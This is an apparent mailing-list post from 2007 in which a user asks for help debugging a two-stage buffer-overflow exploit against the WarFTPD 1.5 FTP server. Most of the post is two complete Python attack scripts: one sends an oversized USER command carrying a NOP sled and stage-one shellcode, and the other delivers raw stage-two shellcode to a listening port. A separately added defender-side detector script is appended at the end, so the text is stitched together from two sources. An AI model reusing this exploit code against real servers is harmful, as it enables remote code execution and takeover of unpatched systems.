Metasploit mailing list archives
Building multistage payloaded exploits?
From: j_fast_and_the_furious at hotmail.com (scotty to hotty)
Date: Wed, 26 Sep 2007 02:02:42 +0000
OK, HD, I've been hard at work trying to understand how the multistage payload works, but no luck, so I've decided to post what I've got so far. I'll first explain what I'm doing step by step: first I launch the first script, which works perfectly (it has stage one of the shellcode). Next I have a second Python script which connects to the first staged code to send the second stage of the exploit.

First stage python script:

#!/usr/bin/python
import socket

# bad chars: "\x0d\x16\xe2"
sc = ("\x89\xe5\xdd\xc7\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
      "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
      "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
      "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
      "\x4b\x4c\x42\x4a\x4a\x4b\x51\x57\x4d\x38\x4c\x39\x4b\x4f\x4b"
      "\x4f\x4b\x4f\x43\x50\x50\x31\x49\x4b\x4c\x4b\x43\x4d\x47\x4c"
      "\x4c\x4b\x43\x4c\x47\x4d\x43\x48\x45\x51\x4a\x4f\x4c\x4b\x46"
      "\x37\x51\x30\x43\x31\x4b\x5a\x4c\x4b\x46\x54\x4c\x5a\x45\x51"
      "\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c\x49\x51\x49\x5a\x44"
      "\x4d\x45\x51\x49\x52\x4b\x34\x49\x50\x42\x55\x4a\x56\x51\x53"
      "\x42\x46\x46\x59\x48\x4a\x43\x45\x4a\x43\x50\x4b\x4c\x4b\x50"
      "\x4f\x47\x54\x43\x31\x4d\x39\x45\x36\x4c\x4b\x45\x4c\x50\x59"
      "\x4c\x4b\x50\x4f\x45\x4c\x43\x31\x4a\x49\x43\x33\x46\x4c\x4c"
      "\x59\x4c\x49\x42\x4c\x51\x34\x45\x4c\x43\x51\x4b\x4f\x4d\x30"
      "\x50\x31\x49\x4b\x42\x44\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x51"
      "\x50\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x45\x38"
      "\x44\x48\x51\x4e\x45\x36\x46\x33\x43\x56\x42\x48\x47\x43\x46"
      "\x52\x45\x38\x43\x47\x42\x53\x47\x42\x51\x4f\x50\x54\x43\x56"
      "\x4e\x59\x42\x52\x45\x30\x4b\x4f\x48\x56\x4c\x55\x50\x53\x46"
      "\x33\x46\x33\x46\x33\x50\x53\x51\x53\x50\x53\x51\x53\x51\x43"
      "\x4b\x39\x4a\x47\x43\x56\x4b\x31\x4a\x4f\x44\x48\x45\x52\x50"
      "\x57\x51\x43\x45\x36\x4e\x59\x4a\x47\x49\x4f\x4b\x4f\x4e\x36"
      "\x42\x46\x4e\x59\x4e\x48\x42\x4f\x4b\x4f\x49\x46\x4c\x57\x45"
      "\x36\x45\x38\x46\x50\x46\x59\x43\x56\x50\x53\x4b\x39\x4d\x31"
      "\x43\x5a\x44\x50\x46\x31\x50\x57\x42\x46\x4e\x59\x4d\x50\x47"
      "\x4b\x4b\x4f\x48\x56\x46\x33\x46\x37\x43\x56\x4e\x59\x42\x55"
      "\x51\x59\x4b\x4f\x49\x46\x50\x54\x46\x34\x46\x34\x51\x47\x45"
      "\x36\x4e\x59\x50\x32\x50\x4c\x4b\x4f\x48\x56\x4d\x47\x50\x50"
      "\x42\x46\x4e\x59\x50\x33\x48\x4e\x4b\x4f\x48\x56\x4b\x39\x4b"
      "\x51\x50\x50\x48\x34\x44\x4c\x46\x30\x46\x31\x46\x37\x50\x51"
      "\x43\x56\x48\x39\x49\x50\x47\x48\x4b\x4f\x4b\x56\x44\x4a\x41"
      "\x41")

#"\xed\x1e\x94\x7c" -> matt wholers computer
# 485 bytes of padding, the 4-byte return address, a 100-byte NOP sled, then stage one
buffer = "A" * 485 + "\x4a\x75\xd4\x77" + "\x90" * 100 + sc + "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.108', 21))
s.recv(1024)                      # banner
s.send("USER " + buffer + '\r\n')
#s.recv(1024)
#s.send(sc + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

Second stage python script:

#!/usr/bin/python
import socket

buffer = ("\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
          "\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
          "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"
          "\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
          "\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"
          "\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
          "\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"
          "\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"
          "\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"
          "\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"
          "\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"
          "\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"
          "\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"
          "\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"
          "\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"
          "\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"
          "\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"
          "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"
          "\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"
          "\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"
          "\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"
          "\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"
          "\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"
          "\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"
          "\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"
          "\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"
          "\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"
          "\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"
          "\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"
          "\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"
          "\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"
          "\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3")

# connect to the port stage one is listening on and deliver stage two
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.108', 12345))
s.recv(1024)
s.send(buffer)
#s.recv(1024)
#s.send(sc)
s.recv(1024)
s.close()

I know that the first stage shellcode works; it's just the second stage that doesn't seem to. On the program I'm exploiting I have OllyDbg monitoring for any flagged errors, and it only trips when I send the second stage. Any way you can tell me what I'm doing wrong? Anyway, that's my exact script, and if you want to know what program I'm exploiting, it's warftpd v1.5. So far I have all single stage exploits working but no luck on getting the multistaged ones to work.
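As an added, defender-side example (not from the original post or anyone in the thread), a small Python check that flags FTP USER commands shaped like the overflow above: an argument far longer than any real username, a run of 0x90 NOP bytes, and non-printable bytes. The 64-byte limit and the 16-NOP threshold are assumptions, and the sample session is constructed with placeholder bytes in place of shellcode.

```python
#!/usr/bin/env python3
# Added example: flag FTP USER commands that look like the WarFTPD-style
# overflow in the thread above (huge padded argument, NOP sled, raw bytes).
import re

# Thresholds are assumptions chosen for illustration, not protocol limits.
MAX_USER_LEN = 64                           # longer than any real username
NOP_SLED_RE = re.compile(rb"\x90{16,}")     # 16 or more consecutive NOPs


def analyse_ftp_command(line: bytes) -> list:
    """Return a list of finding strings for one raw FTP command line."""
    findings = []
    if line[:5].upper() != b"USER ":
        return findings                     # only USER is in scope here
    arg = line[5:].rstrip(b"\r\n")
    if len(arg) > MAX_USER_LEN:
        findings.append(f"USER argument is {len(arg)} bytes (limit {MAX_USER_LEN})")
    if NOP_SLED_RE.search(arg):
        findings.append("NOP sled (run of 0x90 bytes) inside USER argument")
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if non_printable:
        findings.append(f"{non_printable} non-printable bytes in USER argument")
    return findings


def analyse_session(lines) -> dict:
    """Map line index -> findings for every suspicious command in a session."""
    report = {}
    for index, line in enumerate(lines):
        findings = analyse_ftp_command(line)
        if findings:
            report[index] = findings
    return report


# Constructed sample session: a benign login followed by a command laid out
# like the post's buffer (485 bytes of padding, a 4-byte address, a 100-byte
# NOP sled). The trailing 0xCC bytes are a placeholder, not real shellcode.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"USER " + b"A" * 485 + b"\x4a\x75\xd4\x77" + b"\x90" * 100 + b"\xcc" * 8 + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for index, findings in analyse_session(SAMPLE_SESSION).items():
        print(f"line {index}: " + "; ".join(findings))
```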